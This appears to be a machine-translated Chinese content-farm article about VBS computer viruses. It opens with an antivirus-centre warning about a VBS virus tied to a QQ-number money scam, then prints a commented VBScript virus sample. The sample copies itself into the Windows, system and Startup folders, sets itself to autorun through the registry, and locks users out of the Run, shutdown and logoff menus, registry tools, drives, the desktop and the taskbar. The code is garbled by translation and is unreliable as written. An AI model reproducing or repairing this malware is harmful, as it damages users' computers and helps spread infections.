vbs病毒代码大全（vbs的电脑病毒代码是怎样的）

大家好，小太来为大家解答以上问题。vbs病毒代码大全，vbs的电脑病毒代码是怎样的很多人还不知道，现在让我们一起来看看吧！

上海市计算机病毒防治服务中心提醒，本周需要防范一种“VBS病毒”(病毒。VBS.d)也就是网上流行的那个。这种病毒不仅导致多种杀毒软件无法运行，还会弹出“解毒号”等诈骗信息，要求受害者向指定账户汇款。反病毒专家提醒用户不要被这种诈骗信息所迷惑。

据报道，这种病毒可以导致多种杀毒软件或工具出现故障。更有甚者，当被病毒感染的文件数量超过2000个时，会弹出一个对话框提示。消息是：“你已经感染了2000多个文件！不过放心，这个病毒很容易被清除！请联系418465 * *！”根据反病毒专家的分析，这个号码是QQ号。受害者一旦加入这个号码，就会被要求汇款到指定账户。专家提醒，这通常是诈骗。受害者要正常查杀病毒，不要轻信这种诈骗信息。

专家建议，用户上网时应开启杀毒软件的实时监控功能，关闭u盘的“自动播放功能”。用户可以根据自己电脑上安装的操作系统，找到相应的安全漏洞补丁，下载安装。为了遏制利用这些漏洞传播的病毒，减少病毒对电脑用户造成的伤害。

出错时继续下一步

set=createobject(' ing . file system object ' '创建一个可以和操作系统通信的对象，然后使用这个对象的各种方法来操作注册表。

Set dir1=fs.getspecialfolder(0)'获取windows/winnt文件夹位置。

Set dir2=fs.getspecialfolder(1)'获取system32/system文件夹的位置。

set so=createobject(' ing . file system object '

“Dim r”定义了一个变量

set r=createobject('w.shell '

So.getfile (w.fullname)。copy (dir1' \ Win32System.vbs ' '将病毒副本复制到windows/winnt文件夹位置。

So.getfile (w.fullname)。copy (dir2' \ Win32System.vbs ' '将病毒副本复制到system32/system文件夹位置。

所以。getfile (w.fullname)。copy (dir1' \开始菜单\程序\启动\win32system.vbs ' '将病毒副本复制到开始菜单启动菜单

以下是oe对注册表的恶意修改和简单传播。

R.regwrite ' hkcu \ software \ Microsoft \ windows \ current version \ policies \ explorer \ norun '，1，' reg _ dword ' '修改注册表并禁止运行菜单。

R.regwrite ' kcu \ software \ Microsoft \ windows \ current version \ policies \ explorer \ no close '，1，' reg _ dword ' '修改注册表并禁止“关闭”菜单。

R.regwrite ' hkcu \ software \ Microsoft \ windows \ current version \ policies \ explorer \ no drives '，6300000，' reg _ dword ' '修改注册表并隐藏所有逻辑驱动器号。

R.regwrite ' hkcu \ software \ Microsoft \ windows \ current version \ policies \ system \ disable registry tools '，1，' reg _ dword ' '修改注册表并禁止对其进行编辑。

R.regwrite ' hklm \ software \ Microsoft \ windows \ current version \ run \ scan registry '，'''修改注册表以禁止启动注册表扫描。

R.regwrite ' hkcu \ software \ Microsoft \ windows \ current version \ policies \ explorer \ nologoff '，1，' reg _ dword ' '修改注册表并禁止“注销”菜单。

R.regwrite ' hkcu \ software \ Microsoft \ windows \ current version \ policies \ winold app \ no real mode '，1，' reg _ dword ' '修改注册表以禁止ms-dos实模式。

R.regwrite ' hklm \ software \ Microsoft \ windows \ current version \ run \ win32system '，' win32 system。VBS“”修改注册表，以便脚本本身自动启动和运行。

R.regwrite ' hkcu \ software \ Microsoft \ windows \ current version \ policies \ explorer \ no desktop '，1，' reg _ dword ' '修改注册表以禁止显示桌面图标。

R.regwrite ' hkcu \ software \ Microsoft \ windows \ current version \ policies \ winold app \ disabled '，1，' reg _ dword ' '修改注册表以禁止纯dos模式。

r。regwrite ' hkcu \ software \ Microsoft \ windows \ current version \ policies \ explorer \ nosettaskbar '，1，' reg_dword ' '修改注册表，禁止"任务栏和开始"菜单

r。regwrite ' hkcu \ software \ Microsoft \ windows \ current version \ policies \ explorer \ noviewcontextmenu '，1，' reg_dword ' '修改注册表，禁止右键菜单

本文到此结束，希望对大家有所帮助。

免责声明：本文为转载，非本网原创内容，不代表本网观点。其原创性以及文中陈述文字和内容未经本站证实，对本文以及其中全部或者部分内容、文字的真实性、完整性、及时性本站不作任何保证或承诺，请读者仅作参考，并请自行核实相关内容。